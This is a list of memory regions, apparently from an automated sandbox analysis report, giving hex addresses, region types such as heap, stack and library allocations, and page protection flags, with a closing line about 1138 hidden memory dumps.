A1F000
|
stack
|
page read and write
|
||
66B0000
|
direct allocation
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
A45000
|
trusted library allocation
|
page execute and read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
6255000
|
heap
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
3086000
|
heap
|
page read and write
|
||
4858000
|
heap
|
page read and write
|
||
6BC4000
|
heap
|
page read and write
|
||
6CAE000
|
stack
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
51B1000
|
trusted library allocation
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
66B6000
|
direct allocation
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page execute and read and write
|
||
7AEE000
|
stack
|
page read and write
|
||
72BE000
|
stack
|
page read and write
|
||
7790000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
310C000
|
heap
|
page read and write
|
||
4828000
|
heap
|
page read and write
|
||
304E000
|
stack
|
page read and write
|
||
6DD1000
|
heap
|
page read and write
|
||
485D000
|
heap
|
page read and write
|
||
642E000
|
stack
|
page read and write
|
||
274C000
|
heap
|
page read and write
|
||
34A5000
|
trusted library allocation
|
page execute and read and write
|
||
4852000
|
heap
|
page read and write
|
||
7EEF8000
|
trusted library allocation
|
page execute and read and write
|
||
4A81000
|
heap
|
page read and write
|
||
78C5000
|
heap
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
A19000
|
trusted library allocation
|
page read and write
|
||
6B5D000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
98E000
|
unkown
|
page read and write
|
||
484C000
|
heap
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
25FB000
|
stack
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
71B4000
|
heap
|
page read and write
|
||
73D3000
|
trusted library allocation
|
page read and write
|
||
34A7000
|
trusted library allocation
|
page execute and read and write
|
||
6E9D000
|
heap
|
page read and write
|
||
27E6000
|
heap
|
page read and write
|
||
2BCE000
|
stack
|
page read and write
|
||
5217000
|
trusted library allocation
|
page read and write
|
||
4CBD000
|
stack
|
page read and write
|
||
4D0F000
|
stack
|
page read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
2FE1000
|
heap
|
page read and write
|
||
4880000
|
heap
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
7380000
|
heap
|
page read and write
|
||
6F63000
|
heap
|
page read and write
|
||
2CC2000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
62B5000
|
heap
|
page read and write
|
||
2F91000
|
heap
|
page read and write
|
||
2B62000
|
trusted library allocation
|
page read and write
|
||
7BED000
|
stack
|
page read and write
|
||
31A3000
|
heap
|
page read and write
|
||
7E9D000
|
stack
|
page read and write
|
||
4E3F000
|
heap
|
page read and write
|
||
2FA6000
|
heap
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
54DE000
|
heap
|
page read and write
|
||
6C6D000
|
stack
|
page read and write
|
||
741A000
|
stack
|
page read and write
|
||
4F33000
|
trusted library allocation
|
page read and write
|
||
6F2D000
|
heap
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
867E000
|
stack
|
page read and write
|
||
3373000
|
trusted library allocation
|
page execute and read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
4A88000
|
heap
|
page read and write
|
||
7160000
|
heap
|
page read and write
|
||
4AB1000
|
heap
|
page read and write
|
||
70CE000
|
heap
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
2FB2000
|
heap
|
page read and write
|
||
27EE000
|
heap
|
page read and write
|
||
7DF0000
|
heap
|
page read and write
|
||
62B4000
|
heap
|
page read and write
|
||
7F0F000
|
stack
|
page read and write
|
||
8110000
|
heap
|
page read and write
|
||
6D12000
|
heap
|
page read and write
|
||
830E000
|
stack
|
page read and write
|
||
7080000
|
heap
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
280E000
|
heap
|
page read and write
|
||
996000
|
heap
|
page read and write
|
||
27DC000
|
heap
|
page read and write
|
||
4D9C000
|
stack
|
page read and write
|
||
347D000
|
trusted library allocation
|
page execute and read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
6F90000
|
heap
|
page read and write
|
||
A04000
|
trusted library allocation
|
page read and write
|
||
448C000
|
stack
|
page read and write
|
||
94E000
|
unkown
|
page read and write
|
||
304C000
|
heap
|
page read and write
|
||
4BD1000
|
trusted library allocation
|
page read and write
|
||
3473000
|
trusted library allocation
|
page execute and read and write
|
||
4A85000
|
heap
|
page execute and read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
2FA1000
|
heap
|
page read and write
|
||
2C0E000
|
stack
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
49EE000
|
stack
|
page read and write
|
||
3370000
|
trusted library allocation
|
page read and write
|
||
4430000
|
trusted library allocation
|
page read and write
|
||
27EF000
|
heap
|
page read and write
|
||
583C000
|
stack
|
page read and write
|
||
4B82000
|
heap
|
page read and write
|
||
749D000
|
stack
|
page read and write
|
||
7A3E000
|
stack
|
page read and write
|
||
59E0000
|
trusted library allocation
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page execute and read and write
|
||
4438000
|
trusted library allocation
|
page read and write
|
||
4854000
|
heap
|
page read and write
|
||
4AC5000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
4AC0000
|
heap
|
page read and write
|
||
624B000
|
heap
|
page read and write
|
||
F9E000
|
stack
|
page read and write
|
||
A2A000
|
trusted library allocation
|
page execute and read and write
|
||
2B60000
|
trusted library allocation
|
page read and write
|
||
304E000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
4E7F000
|
stack
|
page read and write
|
||
7B6E000
|
stack
|
page read and write
|
||
277E000
|
heap
|
page read and write
|
||
6CD1000
|
heap
|
page read and write
|
||
52BE000
|
trusted library allocation
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
6D95000
|
heap
|
page read and write
|
||
5510000
|
trusted library allocation
|
page read and write
|
||
7287000
|
trusted library allocation
|
page read and write
|
||
7EE0000
|
heap
|
page read and write
|
||
2FD9000
|
heap
|
page read and write
|
||
54E5000
|
trusted library allocation
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
2FB5000
|
heap
|
page read and write
|
||
5AD1000
|
trusted library allocation
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page read and write
|
||
6BC4000
|
heap
|
page read and write
|
||
5011000
|
trusted library allocation
|
page read and write
|
||
78F6000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
A40000
|
trusted library allocation
|
page read and write
|
||
4897000
|
heap
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
6534000
|
trusted library allocation
|
page read and write
|
||
2A60000
|
heap
|
page read and write
|
||
6DCF000
|
heap
|
page read and write
|
||
6C22000
|
heap
|
page read and write
|
||
2FB2000
|
heap
|
page read and write
|
||
6E19000
|
heap
|
page read and write
|
||
6B1C000
|
heap
|
page read and write
|
||
6FCC000
|
heap
|
page read and write
|
||
7870000
|
heap
|
page execute and read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
4EFE000
|
stack
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
3474000
|
trusted library allocation
|
page read and write
|
||
6345000
|
trusted library allocation
|
page read and write
|
||
5C81000
|
trusted library allocation
|
page read and write
|
||
51A0000
|
heap
|
page read and write
|
||
331E000
|
stack
|
page read and write
|
||
3363000
|
heap
|
page read and write
|
||
78BE000
|
heap
|
page read and write
|
||
52A2000
|
trusted library allocation
|
page read and write
|
||
719E000
|
heap
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
54DD000
|
stack
|
page read and write
|
||
483D000
|
heap
|
page read and write
|
||
88B0000
|
heap
|
page read and write
|
||
4D85000
|
heap
|
page execute and read and write
|
||
4E0F000
|
trusted library allocation
|
page read and write
|
||
4C07000
|
heap
|
page read and write
|
||
7340000
|
trusted library allocation
|
page execute and read and write
|
||
4B60000
|
heap
|
page execute and read and write
|
||
6EA4000
|
heap
|
page read and write
|
||
593E000
|
stack
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
68D0000
|
heap
|
page read and write
|
||
82CE000
|
stack
|
page read and write
|
||
8620000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
7911000
|
heap
|
page read and write
|
||
8280000
|
trusted library allocation
|
page read and write
|
||
2D4C000
|
stack
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
55A2000
|
trusted library allocation
|
page read and write
|
||
8113000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
2817000
|
heap
|
page read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
48A5000
|
heap
|
page read and write
|
||
741F000
|
stack
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
6CEB000
|
stack
|
page read and write
|
||
51A2000
|
trusted library allocation
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
2D89000
|
stack
|
page read and write
|
||
528B000
|
trusted library allocation
|
page read and write
|
||
6F24000
|
heap
|
page read and write
|
||
7837000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
4CD0000
|
trusted library allocation
|
page read and write
|
||
2AE0000
|
heap
|
page read and write
|
||
7B30000
|
direct allocation
|
page read and write
|
There are 1138 hidden memdumps, click here to show them.